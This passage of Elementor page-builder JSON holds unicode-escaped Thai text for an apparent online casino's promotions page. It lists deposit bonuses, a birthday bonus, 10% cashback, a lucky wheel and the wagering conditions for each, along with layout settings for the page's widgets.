data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-AMB18.webp\",\"id\":350,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Banner-AMB18.webp\",\"id\":355,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-AMB18.webp\",\"id\":362,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Lucky-wheel-Banner-AMB18.webp\",\"id\":358,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 